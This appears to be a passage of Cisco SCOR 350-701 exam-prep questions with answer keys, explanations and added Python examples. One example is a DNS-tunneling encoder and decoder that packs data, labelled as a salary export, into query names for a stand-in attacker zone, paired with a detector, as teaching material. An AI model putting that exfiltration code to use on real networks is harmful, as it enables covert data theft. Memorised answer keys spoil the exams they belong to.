What are two advantages of using Cisco AnyConnect over DMVPN? (Choose two)

A. It provides spoke-to-spoke communications without traversing the hub
B. It allows different routing protocols to work over the tunnel
C. It allows customization of access policies based on user identity
D. It allows multiple sites to connect to the data center
E. It enables VPN access for individual users from their machines

Answer: C E

Question 39

When choosing an algorithm to use, what should be considered about Diffie-Hellman and RSA for key
establishment?

A. RSA is an asymmetric key establishment algorithm intended to output symmetric keys.
B. RSA is a symmetric key establishment algorithm intended to output asymmetric keys.
C. DH is a symmetric key establishment algorithm intended to output asymmetric keys.
D. DH is an asymmetric key establishment algorithm intended to output symmetric keys.

Answer: D

Explanation

Diffie Hellman (DH) uses a private-public key pair to establish a shared secret, typically a symmetric key.
DH is not a symmetric algorithm – it is an asymmetric algorithm used to establish a shared secret for a
symmetric key algorithm.
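
A worked exchange, added here as an example and not part of the original text, showing what "asymmetric in, symmetric out" means: each side keeps a private exponent and publishes g^x mod p, both arrive at the same g^(ab) mod p, and that integer is run through HKDF-SHA256 to produce a 32-byte symmetric key, the kind of output IKE turns into IPsec SA keys. The group parameters (p = 2^61 - 1, g = 7) are a toy size chosen for readability; they are insecure and a real implementation uses an RFC 7919 group or ECDH. The range check on the peer's public value is the one a practitioner should not omit.

```python
import hashlib
import hmac
import secrets

# Toy group, constructed for readability: p = 2**61 - 1 is prime but far too small to be
# secure, and g = 7 is an arbitrary base. Real code uses an RFC 7919 group or ECDH.
P = 2**61 - 1
G = 7


def keypair(p: int = P, g: int = G):
    """The asymmetric half: a secret exponent x and the public value g^x mod p."""
    x = secrets.randbelow(p - 3) + 2          # 2 <= x <= p - 2
    return x, pow(g, x, p)


def validate_public(y: int, p: int = P) -> int:
    """Reject 0, 1 and p-1: a peer sending these forces the shared secret to a known value."""
    if not 2 <= y <= p - 2:
        raise ValueError("peer public value out of range")
    return y


def shared_symmetric_key(private: int, peer_public: int, p: int = P,
                         info: bytes = b"esp-aes-256 demo") -> bytes:
    """The symmetric output: both sides compute g^(ab) mod p, then HKDF-SHA256 turns that
    integer into a fixed-length key. Returns 32 bytes, enough for AES-256."""
    z = pow(validate_public(peer_public, p), private, p)
    if z in (1, p - 1):
        raise ValueError("degenerate shared secret")
    z_bytes = z.to_bytes((p.bit_length() + 7) // 8, "big")
    prk = hmac.new(b"", z_bytes, hashlib.sha256).digest()            # HKDF-Extract, empty salt
    return hmac.new(prk, info + b"\x01", hashlib.sha256).digest()    # HKDF-Expand, block T(1)


def demo() -> bool:
    """Run one exchange and report whether both sides derived the same key."""
    a, pub_a = keypair()
    b, pub_b = keypair()
    return shared_symmetric_key(a, pub_b) == shared_symmetric_key(b, pub_a)


if __name__ == "__main__":
    print("keys match:", demo())
```

Only the public values cross the wire; an observer who sees g^a and g^b still cannot compute g^(ab) without solving the discrete logarithm, which is the whole reason the exchange can output a symmetric key over an untrusted network.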

Question 40

Which type of DNS abuse exchanges data between two computers even when there is no direct
connection?

A. malware installation
B. command-and-control communication
C. network footprinting
D. data exfiltration

Answer: D

Explanation

Malware installation: This may be done by hijacking DNS queries and responding with malicious IP
addresses.

Command & Control communication: As part of lateral movement, after an initial compromise, DNS
communication is abused to talk to a C2 server. This typically involves periodic DNS queries from a
computer in the target network for a domain controlled by the adversary. The responses contain encoded
messages that may be used to perform unauthorized actions in the target network.

Network footprinting: Adversaries use DNS queries to build a map of the network. Attackers live off the
terrain so developing a map is important to them.

Data theft (exfiltration): Abuse of DNS to transfer data; this may be performed by tunneling other
protocols like FTP, SSH through DNS queries and responses. Attackers make multiple DNS queries from a
compromised computer to a domain owned by the adversary. DNS tunneling can also be used for
executing commands and transferring malware into the target network.

Reference: https://www.netsurion.com/articles/5-types-of-dns-attacks-and-how-to-detect-them

Question 41

What is a difference between GETVPN and IPsec?

A. GETVPN reduces latency and provides encryption over MPLS without the use of a central hub
B. GETVPN provides key management and security association management
C. GETVPN is based on IKEv2 and does not support IKEv1
D. GETVPN is used to build a VPN network with multiple sites without having to statically configure all
devices

Answer: A

Explanation

GETVPN is tunnel-less: a key server distributes one group SA and its traffic encryption keys to every
group member, so there is no per-pair IPsec negotiation when two sites start talking and no hub to
traverse. The original IP header is preserved, which is why it suits MPLS networks where the provider
already routes between sites. The cited book makes the same point about GETVPN with DMVPN: the delay
caused by IPsec tunnel negotiation is eliminated because connections are static.

Reference: Network Security Technologies and Solutions (CCIE Professional Development) Book

Moreover, GETVPN is a site-to-site VPN so it does not require a central hub.

Question 42

What is a benefit of using telemetry over SNMP to configure new routers for monitoring purposes?

A. Telemetry uses a pull method, which makes it more reliable than SNMP
B. Telemetry uses push and pull, which makes it more scalable than SNMP
C. Telemetry uses push and pull, which makes it more secure than SNMP
D. Telemetry uses a push method, which makes it faster than SNMP

Answer: D

Explanation

SNMP polling can often be in the order of 5-10 minutes, CLIs are unstructured and prone to change which
can often break scripts.
The traditional use of the pull model, where the client requests data from the network does not scale when
what you want is near real-time data.
Moreover, in some use cases, there is the need to be notified only when some data changes, like
interfaces status, protocol neighbors change etc.
Model-Driven Telemetry is a new approach for network monitoring in which data is streamed from network
devices continuously using a push model and provides near real-time access to operational statistics.

Reference: https://developer.cisco.com/docs/ios-xe/#!streaming-telemetry-quick-start-guide/streaming-telemetry

Question 43

An organization wants to use Cisco FTD or Cisco ASA devices. Specific URLs must be blocked from being
accessed via the firewall which requires that the administrator input the bad URL categories that the
organization wants blocked into the access policy. Which solution should be used to meet this
requirement?

A. Cisco ASA because it enables URL filtering and blocks malicious URLs by default, whereas Cisco FTD
does not
B. Cisco ASA because it includes URL filtering in the access control policy capabilities, whereas Cisco FTD
does not
C. Cisco FTD because it includes URL filtering in the access control policy capabilities, whereas Cisco ASA
does not
D. Cisco FTD because it enables URL filtering and blocks malicious URLs by default, whereas Cisco ASA
does not

Answer: C

Question 44

An administrator configures a Cisco WSA to receive redirected traffic over ports 80 and 443. The
organization requires that a network device with specific WSA integration capabilities be configured to
send the traffic to the WSA to proxy the requests and increase visibility, while making this invisible to the
users. What must be done on the Cisco WSA to support these requirements?

A. Configure transparent traffic redirection using WCCP in the Cisco WSA and on the network device
B. Configure active traffic redirection using WPAD in the Cisco WSA and on the network device
C. Use the Layer 4 setting in the Cisco WSA to receive explicit forward requests from the network device
D. Use PAC keys to allow only the required network devices to send the traffic to the Cisco WSA

Answer: A

Question 45

An administrator configures new authorization policies within Cisco ISE and has difficulty profiling the
devices. Attributes for the new Cisco IP phones that are profiled based on the RADIUS authentication are
seen however the attributes for CDP or DHCP are not. What should the administrator do to address this
issue?

A. Configure the ip dhcp snooping trust command on the DHCP interfaces to get the information to
Cisco ISE
B. Configure the authentication port-control auto feature within Cisco ISE to identify the devices that are
trying to connect
C. Configure a service template within the switch to standardize the port configurations so that the correct
information is sent to Cisco ISE
D. Configure the device sensor feature within the switch to send the appropriate protocol information

Answer: D

Explanation

Device sensor is a feature of access devices that collects information about connected endpoints.
Mostly, the information collected by Device Sensor comes from the following protocols:
+ Cisco Discovery Protocol (CDP)
+ Link Layer Discovery Protocol (LLDP)
+ Dynamic Host Configuration Protocol (DHCP)

Reference: https://www.cisco.com/c/en/us/support/docs/security/identity-services-engine/200292-Configure-Device-Sensor-for-ISE-Profilin.html

Question 46

A network engineer must monitor user and device behavior within the on-premises network. This data
must be sent to the Cisco Stealthwatch Cloud analytics platform for analysis. What must be done to meet
this requirement using the Ubuntu-based VM appliance deployed in a VMware-based hypervisor?

A. Configure a Cisco FMC to send syslogs to Cisco Stealthwatch Cloud
B. Deploy the Cisco Stealthwatch Cloud PNM sensor that sends data to Cisco Stealthwatch Cloud
C. Deploy a Cisco FTD sensor to send network events to Cisco Stealthwatch Cloud
D. Configure a Cisco FMC to send NetFlow to Cisco Stealthwatch Cloud

Answer: B

Explanation

The Stealthwatch Cloud Private Network Monitoring (PNM) Sensor is an extremely flexible piece of
technology, capable of being utilized in a number of different deployment scenarios. It can be deployed as
a complete Ubuntu based virtual appliance on different hypervisors (e.g. –VMware, VirtualBox). It can be
deployed on hardware running a number of different Linux-based operating systems.

Reference: https://www.ciscolive.com/c/dam/r/ciscolive/us/docs/2019/pdf/5eU6DfQV/LTRSEC-2240-LG2.pdf

Question 47

An organization uses Cisco FMC to centrally manage multiple Cisco FTD devices. The default management
port conflicts with other communications on the network and must be changed. What must be done to
ensure that all devices can communicate together?

A. Manually change the management port on Cisco FMC and all managed Cisco FTD devices
B. Set the tunnel to go through the Cisco FTD
C. Change the management port on Cisco FMC so that it pushes the change to all managed Cisco FTD
devices
D. Set the tunnel port to 8305

Answer: A

Explanation

The FMC and managed devices communicate using a two-way, SSL-encrypted communication channel,
which by default is on port 8305.

Cisco strongly recommends that you keep the default settings for the remote management port, but if the
management port conflicts with other communications on your network, you can choose a different port. If
you change the management port, you must change it for all devices in your deployment that need to
communicate with each other.

Reference: https://www.cisco.com/c/en/us/td/docs/security/firepower/misc/fmc-ftd-mgmt-nw/fmc-ftd-mgmt-nw.html

Question 48

Which service allows a user to export application usage and performance statistics with Cisco Application
Visibility and Control?

A. SNORT
B. NetFlow
C. SNMP
D. 802.1X

Answer: B

Explanation

Application Visibility and Control (AVC) supports NetFlow to export application usage and performance
statistics. This data can be used for analytics, billing, and security policies.

Question 49

An engineer adds a custom detection policy to a Cisco AMP deployment and encounters issues with the
configuration. The simple detection mechanism is configured, but the dashboard indicates that the hash is
not 64 characters and is non-zero. What is the issue?

A. The engineer is attempting to upload a hash created using MD5 instead of SHA-256
B. The file being uploaded is incompatible with simple detections and must use advanced detections
C. The hash being uploaded is part of a set in an incorrect format
D. The engineer is attempting to upload a file instead of a hash

Answer: A
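
Questions 27 and 49 turn on the same detail: a simple custom detection in AMP for Endpoints is keyed by the file's SHA-256, and the dashboard rejects an entry that is not 64 hex characters or is all zeros. The following Python, added here as an example and not taken from Cisco's code, computes the hash the policy needs, reproduces that acceptance check so a pasted MD5 (32 characters) or a pasted path is caught before upload, and shows the comparison the connector makes when a file executes. The sample file bytes are constructed.

```python
import hashlib
import re

HEX_RE = re.compile(r"^[0-9a-f]+$")
DIGEST_LENGTHS = {32: "MD5", 40: "SHA-1", 64: "SHA-256"}  # hex characters per algorithm


def sha256_hex(data: bytes) -> str:
    """The value to paste into a simple custom detection: SHA-256 of the file, hex encoded."""
    return hashlib.sha256(data).hexdigest()


def check_detection_hash(value: str) -> str:
    """Reproduce the dashboard's acceptance test (64 hex characters, not all zero).
    Returns 'ok' or a reason the entry will be rejected."""
    v = value.strip().lower()
    if not HEX_RE.match(v):
        return "rejected: not a hex string (a file or a path was pasted instead of its hash?)"
    if set(v) == {"0"}:
        return "rejected: all-zero hash"
    if len(v) != 64:
        algo = DIGEST_LENGTHS.get(len(v), "an unknown algorithm")
        return f"rejected: {len(v)} hex chars looks like {algo}; a 64-char SHA-256 is required"
    return "ok"


def policy_matches(file_bytes: bytes, detection_hashes) -> bool:
    """What the connector does when a file executes: hash it and look it up in the policy's list.
    Entries that would have been rejected by the dashboard are ignored here as well."""
    wanted = {h.strip().lower() for h in detection_hashes if check_detection_hash(h) == "ok"}
    return sha256_hex(file_bytes) in wanted


# Constructed sample bytes (not real malware) to show the flow end to end.
SAMPLE_FILE = b"MZ\x90\x00constructed sample for the example, not a real binary"

if __name__ == "__main__":
    h = sha256_hex(SAMPLE_FILE)
    print(h, check_detection_hash(h))
    print(check_detection_hash("d41d8cd98f00b204e9800998ecf8427e"))  # an MD5 digest, rejected
    print(policy_matches(SAMPLE_FILE, [h]))
```

The same check explains why a detection that was created from an MD5 taken from a vendor report never fires: the connector compares SHA-256 values, so the entry must be the 64-character digest of the same bytes.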

Question 50

Drag and drop the cloud security assessment components from the left onto the definitions on the right.

Answer:

cloud data protection assessment: understand the security posture of the data or activity taking place
in public cloud deployments
cloud security strategy workshop: develop a cloud security strategy and roadmap aligned to business
priorities
cloud security architecture assessment: identify strengths and areas for improvement in the current
security architecture during onboarding
user entity behavior assessment: detect potential anomalies in user behavior that suggest malicious
behavior in a Software-as-a-Service application

Explanation

Cloud Data Protection Assessment: We review the security posture of documents stored in one Software-
as-a-Service (SaaS) instance, or review the activity taking place in an Infrastructure-as-a-Service (IaaS)
deployment over a period of time.

Cloud Security Architecture Assessment: We conduct whiteboarding sessions, interviews, and documentation
reviews to assess the security architecture of your cloud environment.

Cloud User Entity Behavior Assessment: We examine how the users provisioned in a SaaS instance
behave, establish a baseline for each individual user, and monitor user activity.

Cloud Security Strategy: Our experts educate your team on cloud security as related to current and future
states, as well as business priorities.

Reference: https://www.cisco.com/c/dam/en/us/products/security/security-strategy-advisory-aag.pdf

Question 51

Refer to the exhibit.

What does this python script accomplish?

A. It lists the LDAP users from the external identity store configured on Cisco ISE
B. It authenticates to a Cisco ISE server using the username of ersad
C. It allows authentication with TLSv1 SSL protocol
D. It authenticates to a Cisco ISE with an SSH connection

Answer: A

Explanation

In this question the username "ersad" is just an example and it appears in a comment (which starts with
a #), so it has no effect on the script. The username is taken from the second argument of the command.
For example, if the script is saved as "Internal_user.py" and called with:

python Internal_user.py 192.168.1.10 digitaltut digitaltutPassWord!

then the username is "digitaltut".

-> Answer B is not correct.

From the line conn = http.client.HTTPSConnection("{}:9060".format(host),
context=ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)), we specify TLS version 1.2 as the channel encryption
protocol (not TLSv1) -> Answer C is not correct.

Also from the line above, we are using HTTPS to make a request. It is different from a SSH connection so
answer D is not correct.

-> Therefore only answer A is left.

Note: This Python script retrieves guest users through the ISE External RESTful Services (ERS) API. ERS
is designed to allow external clients to perform CRUD (Create, Read, Update, Delete) operations on Cisco
ISE resources.
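
The exhibit itself is not reproduced, so the following Python, added as an example and not the script from the question, reconstructs the pattern the explanation describes: host, username and password from the command line, HTTP Basic authentication against ISE ERS on port 9060, and a TLS context pinned to 1.2. One caveat the explanation does not mention: ssl.SSLContext(ssl.PROTOCOL_TLSv1_2) as written in the exhibit pins the protocol version but leaves certificate and hostname verification off, so the example uses PROTOCOL_TLS_CLIENT with minimum_version set instead. The ERS path /ers/config/internaluser and the SearchResult/resources response shape are from the ERS API as I know it; treat them as assumptions to verify against your ISE version.

```python
import base64
import http.client
import json
import ssl
import sys

ERS_PORT = 9060   # ISE ERS listens here, as in the exhibit's HTTPSConnection("{}:9060")
# Assumption: the ERS resource path for internal users, as documented for the ERS API.
INTERNAL_USER_PATH = "/ers/config/internaluser"


def basic_auth_header(username: str, password: str) -> dict:
    """ERS authenticates the ERS admin account with HTTP Basic; Accept selects JSON."""
    token = base64.b64encode(f"{username}:{password}".encode()).decode()
    return {"Authorization": f"Basic {token}", "Accept": "application/json"}


def tls_context() -> ssl.SSLContext:
    """TLS 1.2 as the floor, with certificate and hostname verification kept on.
    ssl.SSLContext(ssl.PROTOCOL_TLSv1_2), as in the exhibit, pins the version but leaves
    verify_mode at CERT_NONE, so a man-in-the-middle could read the ERS password."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)   # CERT_REQUIRED + check_hostname by default
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx


def extract_user_names(payload: dict) -> list:
    """Assumed ERS list shape: {"SearchResult": {"total": n, "resources": [{"id", "name", ...}]}}."""
    return [r["name"] for r in payload.get("SearchResult", {}).get("resources", [])]


def list_internal_users(host: str, username: str, password: str) -> list:
    conn = http.client.HTTPSConnection(host, ERS_PORT, context=tls_context(), timeout=15)
    conn.request("GET", INTERNAL_USER_PATH, headers=basic_auth_header(username, password))
    resp = conn.getresponse()
    body = resp.read()
    if resp.status != 200:
        raise RuntimeError(f"ERS returned HTTP {resp.status}: {body[:200]!r}")
    return extract_user_names(json.loads(body))


if __name__ == "__main__":
    # Usage: python ers_users.py <ise-host> <ers-username> <ers-password>
    ise_host, ers_user, ers_pass = sys.argv[1:4]
    for name in list_internal_users(ise_host, ers_user, ers_pass):
        print(name)
```

Passing the password on the command line, as the question's invocation does, leaves it in shell history and visible in the process list; reading it from an environment variable or a prompt is the usual fix.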

Question 52

Refer to the exhibit.

ntp authentication-key 10 md5 cisco123
ntp trusted-key 10

A network engineer is testing NTP authentication and realizes that any device synchronizes time with this
router and that NTP authentication is not enforced. What is the cause of this issue?

A. The hashing algorithm that was used was MD5 which is unsupported.
B. The key was configured in plain text.
C. NTP authentication is not enabled.
D. The router was not rebooted after the NTP configuration updated

Answer: C

Explanation

In order to enforce NTP authentication, the additional command "ntp authenticate" is required; defining
and trusting a key without it leaves authentication disabled.
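
A compliance check of the kind a practitioner would run over a running-config, added as an example and not part of the original page: it parses the NTP lines and reports a key that is defined but never enforced because ntp authenticate is absent, a key missing from ntp trusted-key, and an association that has no key attached. WEAK_CONFIG is the exhibit plus a constructed server line; FIXED_CONFIG adds the missing command.

```python
import re

# Constructed configs: WEAK_CONFIG is the exhibit plus a typical server line, FIXED_CONFIG
# adds the command the exhibit is missing.
WEAK_CONFIG = """\
ntp authentication-key 10 md5 cisco123
ntp trusted-key 10
ntp server 192.0.2.10 key 10
"""
FIXED_CONFIG = WEAK_CONFIG + "ntp authenticate\n"


def audit_ntp_authentication(config: str) -> dict:
    """Check an IOS running-config excerpt for NTP authentication being fully wired up.
    Returns {'enforced': bool, 'findings': [reasons it is not]}."""
    keys = set(re.findall(r"^ntp authentication-key (\d+) ", config, re.M))
    trusted = set(re.findall(r"^ntp trusted-key (\d+)", config, re.M))
    assoc = re.findall(r"^ntp (?:server|peer) (\S+)(?:.*?\bkey (\d+))?", config, re.M)
    findings = []
    # Without 'ntp authenticate' the keys are decoration: unauthenticated packets still sync.
    if not re.search(r"^ntp authenticate\s*$", config, re.M):
        findings.append("ntp authenticate is absent: defined keys are never enforced")
    if not keys:
        findings.append("no ntp authentication-key is defined")
    for k in sorted(keys - trusted):
        findings.append(f"key {k} is defined but not listed in ntp trusted-key")
    for peer, k in assoc:
        if not k:
            findings.append(f"association with {peer} carries no key and will sync unauthenticated")
        elif k not in keys:
            findings.append(f"association with {peer} references undefined key {k}")
    return {"enforced": not findings, "findings": findings}


if __name__ == "__main__":
    for label, cfg in (("exhibit", WEAK_CONFIG), ("fixed", FIXED_CONFIG)):
        print(label, audit_ntp_authentication(cfg))
```

The regular expressions are anchored to the start of a line so that "ntp authentication-key" is never mistaken for "ntp authenticate"; the two commands share a prefix and are easy to confuse when grepping a config by eye.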

Question 53

Refer to the exhibit.

How does Cisco Umbrella manage traffic that is directed toward risky domains?

A. Traffic is managed by the application settings, unhandled and allowed
B. Traffic is allowed but logged
C. Traffic is managed by the security settings and blocked
D. Traffic is proxied through the intelligent proxy

Answer: C

Explanation

The ‘greylist’ of risky domains is composed of domains that host both malicious and safe content—we
consider these “risky” domains. These sites often allow users to upload and share content—making them
difficult to police, even for the admins of the site.

Reference: https://docs.umbrella.com/deployment-msp/docs/what-is-the-intelligent-proxy

In order to enable the intelligent proxy, the Advanced Settings section of the policy must be used (the
dashboard screenshot is not reproduced here). In this question the Advanced Settings section (located at
the bottom of the exhibit) was not used -> Answer D is not correct.

Application Settings organize applications into categories based on the type of processes or services
provided; for example, shopping, education, or human resources -> It can only manage applications and it
cannot filter domains -> Answer A is not correct.

In the Security Settings there is a category named "Potentially Harmful Domains", and these can be
considered "risky domains". This category is disabled by default. The exhibit in this question is not
clear, so if this category is not enabled under Security Settings we can deduce that traffic to
"Potentially Harmful Domains" is allowed.

Note:

+ The security settings categories are, at a minimum, the ones listed on the Security Settings page of
the Umbrella dashboard (screenshot not reproduced here).
+ "Potentially Harmful Domains" are domains that exhibit suspicious behavior and may be part of an
attack. This category has a higher risk of unwanted detections.

Question 54

An administrator is adding a new Cisco ISE node to an existing deployment. What must be done to ensure
that the addition of the node will be successful when inputting the FQDN?

A. Change the IP address of the new Cisco ISE node to the same network as the others
B. Make the new Cisco ISE node a secondary PAN before registering it with the primary
C. Open port 8905 on the firewall between the Cisco ISE nodes
D. Add the DNS entry for the new Cisco ISE node into the DNS server

Answer: B

Question 55

Refer to the exhibit.

crypto ikev2 name-mangler MANGLER
 dn organization-unit

An engineer is implementing a certificate based VPN. What is the result of the existing configuration?

A. The OU of the IKEv2 peer certificate is used as the identity when matching an IKEv2 authorization
policy
B. Only an IKEv2 peer that has an OU certificate attribute set to MANGLER establishes an IKEv2 SA
successfully
C. The OU of the IKEv2 peer certificate is encrypted when the OU is set to MANGLER
D. The OU of the IKEv2 peer certificate is set to MANGLER

Answer: A

Question 56

An organization wants to implement a cloud-delivered and SaaS-based solution to provide visibility and
threat detection across the AWS network. The solution must be deployed without software agents and rely
on AWS VPC flow logs instead. Which solution meets these requirements?

A. Cisco Stealthwatch Cloud
B. Cisco Umbrella
C. NetFlow collectors
D. Cisco Cloudlock

Answer: A

Question 57

How is data sent out to the attacker during a DNS tunneling attack?

A. as part of the UDP/53 packet payload
B. as part of the domain name
C. as part of the TCP/53 packet header
D. as part of the DNS response packet

Answer: B
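
Questions 40 and 57 describe the same mechanism from two sides, so one added example (not from the original page) covers both: the client side that packs data into the query name as base32 labels within the RFC 1035 limits of 63 characters per label and 253 per name, the attacker side that reassembles the bytes from the authoritative server's query log, and a crude detector that flags long or high-entropy subdomains beneath a registered domain. The zone t.example.net and the payload are constructed.

```python
import base64
import math
from collections import Counter

ZONE = "t.example.net"   # constructed attacker-controlled zone; its authoritative server is the attacker's
MAX_LABEL = 63           # RFC 1035 label limit
MAX_NAME = 253           # RFC 1035 name limit (dotted form)


def encode_queries(data: bytes, zone: str = ZONE) -> list:
    """Compromised-host side: turn bytes into query names '<seq>.<label>...<zone>'.
    base32 is case-insensitive and DNS-safe; '=' padding is stripped and restored on decode."""
    b32 = base64.b32encode(data).decode().rstrip("=").lower()
    labels = [b32[i:i + MAX_LABEL] for i in range(0, len(b32), MAX_LABEL)]
    names, seq, cur = [], 0, []
    for label in labels:
        candidate = ".".join([str(seq)] + cur + [label, zone])
        if cur and len(candidate) > MAX_NAME:       # this name is full, start the next one
            names.append(".".join([str(seq)] + cur + [zone]))
            seq, cur = seq + 1, [label]
        else:
            cur.append(label)
    if cur:
        names.append(".".join([str(seq)] + cur + [zone]))
    return names


def decode_queries(names: list, zone: str = ZONE) -> bytes:
    """Attacker side: order by the sequence label, strip the zone, re-pad and base32-decode."""
    parts = []
    for name in names:
        labels = name[: -len(zone) - 1].split(".")
        parts.append((int(labels[0]), "".join(labels[1:])))
    b32 = "".join(chunk for _, chunk in sorted(parts)).upper()
    b32 += "=" * (-len(b32) % 8)
    return base64.b32decode(b32)


def shannon_entropy(s: str) -> float:
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values()) if s else 0.0


def is_suspicious(name: str) -> bool:
    """Detector over a single query name. Everything below the registered domain is treated as
    the carrier; long labels or long high-entropy subdomains are what encoded payload looks like.
    Assumption: the registered domain is the last two labels (no public-suffix handling)."""
    labels = name.lower().rstrip(".").split(".")
    sub = labels[:-2]
    if not sub:
        return False
    subtext = "".join(sub)
    return max(map(len, sub)) > 40 or (len(subtext) > 50 and shannon_entropy(subtext) > 3.5)


# Constructed payload and benign names for the demonstration.
PAYLOAD = b"constructed: employee salary export 2022 " * 8
BENIGN = ["www.example.com", "mail.google.com", "api-v2.cdn.example.org"]

if __name__ == "__main__":
    queries = encode_queries(PAYLOAD)
    print(len(queries), "queries carry", len(PAYLOAD), "bytes; roundtrip ok:",
          decode_queries(queries) == PAYLOAD)
    for q in queries + BENIGN:
        print(is_suspicious(q), q[:60])
```

Note what the detector does not see: a tunnel that keeps labels short and spreads data across many queries drops below both thresholds, which is why production detection also counts queries per client per domain and looks at the volume of NXDOMAIN or TXT responses, not just the shape of one name.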

Question 58

A network engineer must configure a Cisco ESA to prompt users to enter two forms of information before
gaining access. The Cisco ESA must also join a cluster machine using preshared keys. What must be
configured to meet these requirements?

A. Enable two-factor authentication through a RADIUS server and then join the cluster by using the Cisco
ESA CLI
B. Enable two-factor authentication through a RADIUS server and then join the cluster by using the Cisco
ESA GUI
C. Enable two-factor authentication through a TACACS+ server and then join the cluster by using the Cisco
ESA GUI
D. Enable two-factor authentication through a TACACS+ server and then join the cluster by using the
Cisco ESA CLI

Answer: A

Explanation

You cannot create or join a cluster from the Graphical User Interface (GUI). You must use the Command
Line Interface (CLI) to create, join, or configure clusters of machines. Once you have created a cluster,
you can change configuration settings from either the GUI or the CLI.

Reference: https://www.cisco.com/c/en/us/td/docs/security/esa/esa11-0/user_guide_fs/b_ESA_Admin_Guide_11_0/b_ESA_Admin_Guide_chapter_0100111.html

Cisco ESA does not support TACACS+ server.

Question 59

What is the term for having information about threats and threat actors that helps mitigate harmful events
that would otherwise compromise networks or systems?

A. trusted automated exchange
B. Indicators of Compromise
C. The Exploit Database
D. threat intelligence

Answer: D

Explanation

Threat intelligence is referred to as the knowledge about an existing or emerging threat to assets,
including networks and systems. Threat intelligence includes context, mechanisms, indicators of
compromise (IoCs), implications, and actionable advice. Threat intelligence is referred to as the
information about the observables, IoCs intent, and capabilities of internal and external threat actors and
their attacks.

Reference: CCNP and CCIE Security Core SCOR 350-701 Official Cert Guide.

Question 60

Which Cisco platform processes behavior baselines, monitors for deviations, and reviews for malicious
processes in data center traffic and servers while performing software vulnerability detection?

A. Cisco Tetration
B. Cisco ISE
C. Cisco AMP for Network
D. Cisco AnyConnect

Answer: A

Explanation

From the Cisco Secure Workload (formerly Tetration) Q&A, the platform supports the following use cases:

+ Process behavior baseline and deviation: Collect the complete process inventory along with the process
hash information, baseline the behavior, and identify deviations.
+ Software inventory and vulnerability detection: Identify all the software packages and versions installed
on the servers. Using the Common Vulnerabilities and Exposures (CVE) database and additional data
feeds, detect if there are any associated vulnerabilities or exposures and take action to protect against
active exploit.

Reference: https://www.cisco.com/c/en/us/products/collateral/data-center-analytics/tetration-analytics/q-and-a-c67-737402.html

Question 61

Which portion of the network do EPP solutions solely focus on and EDR solutions do not?

A. server farm
B. perimeter
C. core
D. East-West gateways

Answer: B

Question 62

What is a benefit of using Cisco CWS compared to an on-premises Cisco WSA?

A. Cisco CWS eliminates the need to backhaul traffic through headquarters for remote workers whereas
Cisco WSA does not
B. Cisco CWS minimizes the load on the internal network and security infrastructure as compared to Cisco
WSA.
C. URL categories are updated more frequently on Cisco CWS than they are on Cisco WSA
D. Content scanning for SaaS cloud applications is available through Cisco CWS and not available through
Cisco WSA

Answer: A

Explanation

Malware can enter the Cisco network when an infected user PC connects over a direct link in the office or a
VPN link from a remote location. For these connections, Cisco IT uses the Cisco Web Security Appliance
(WSA) to protect the network from malware intrusion. However, WSA protection is not available when a
user connects to the Internet directly, without connecting via the Cisco network, such as when using a
public Wi-Fi service in a coffee shop. In this case, the user’s PC can become infected with malware, which
may disrupt the user’s activity, spread to other networks and devices, and present the risk of a data
security or privacy breach. Cisco IT uses the Cisco Cloud Web Security (CWS) solution to help protect user
PCs from these malware infections.

The Cisco CWS solution, previously known as Cisco Scan Safe, enforces secure communication to and from
the Internet. It uses the Cisco AnyConnect Secure Mobility Client 3.0 to provide remote workers the same
level of security as onsite employees when using a laptop issued by Cisco.

Reference: https://www.cisco.com/c/dam/en_us/about/ciscoitatwork/borderless_networks/docs/Cloud_Web_Security_IT_Methods.pdf

Cisco ISR with Cloud Web Security Connector: eliminates the need to backhaul Internet traffic from branch
offices, so offices can access the web directly, without losing control of or visibility into web usage.

Reference: https://www.cisco.com/c/en/us/products/collateral/security/router-security/data_sheet_c78-
655324.pdf

Question 63

An organization wants to improve its cybersecurity processes and to add intelligence to its data. The
organization wants to utilize the most current intelligence data for URL filtering, reputations, and
vulnerability information that can be integrated with the Cisco FTD and Cisco WSA. What must be done to
accomplish these objectives?

A. Create a Cisco pxGrid connection to NIST to import this information into the security products for policy
use
B. Create an automated download of the Internet Storm Center intelligence feed into the Cisco FTD and
Cisco WSA databases to tie to the dynamic access control policies.
C. Download the threat intelligence feed from the IETF and import it into the Cisco FTD and Cisco WSA
databases
D. Configure the integrations with Talos Intelligence to take advantage of the threat intelligence that it
provides

Answer: D

Explanation

Neither NIST nor the IETF publishes a threat intelligence feed that Cisco FTD or Cisco WSA can consume
directly, and pxGrid is for exchanging context between ISE and its partners rather than for importing
external feeds, so answers A and C are not correct. An Internet Storm Center feed (answer B) is not a native
FTD/WSA integration either.

According to the following facts about Talos, we believe answer D is the best choice:

Cisco WSA detects and correlates threats in real time by tapping into the largest threat-detection network
in the world, Cisco Talos. To discover where threats are hiding, Cisco Talos pulls massive quantities of
information across multiple vectors – firewall, IPS, web, email, and VPN. Cisco Talos constantly refreshes
information every 3 to 5 minutes – adding intelligence to and receiving intelligence from Cisco WSA and
other network security devices. This enables Cisco WSA to deliver industry-leading defense hours and even
days ahead of competitors.

Reference: https://www.cisco.com/c/en/us/products/collateral/security/web-security-appliance/solution-
overview-c22-732948.html

Talos’ threat intelligence supports a two-way flow of telemetry and protection across market-leading
security solutions including Next-Generation Intrusion Prevention System (NGIPS), Next-Generation
Firewall (NGFW), Advanced Malware Protection (AMP), Email Security Appliance (ESA), Cloud Email
Security (CES), Cloud Web Security (CWS), Web Security Appliance (WSA), Umbrella, and ThreatGrid, as
well as numerous open-source and commercial threat protection systems.

Reference: https://www.talosintelligence.com/docs/Talos_WhitePaper.pdf

Question 64

Cisco SensorBase gathers threat information from a variety of Cisco products and services and performs
analytics to find patterns on threats. Which term describes this process?

A. deployment
B. consumption
C. authoring
D. sharing

Answer: A

Question 65

An organization has a requirement to collect full metadata information about the traffic going through their
AWS cloud services. They want to use this information for behavior analytics and statistics. Which two
actions must be taken to implement this requirement? (Choose two)

A. Configure Cisco ACI to ingest AWS information
B. Configure Cisco Thousand Eyes to ingest AWS information
C. Send syslog from AWS to Cisco Stealthwatch Cloud
D. Send VPC Flow Logs to Cisco Stealthwatch Cloud
E. Configure Cisco Stealthwatch Cloud to ingest AWS information

Answer: D E

Question 66

Refer to the exhibit.



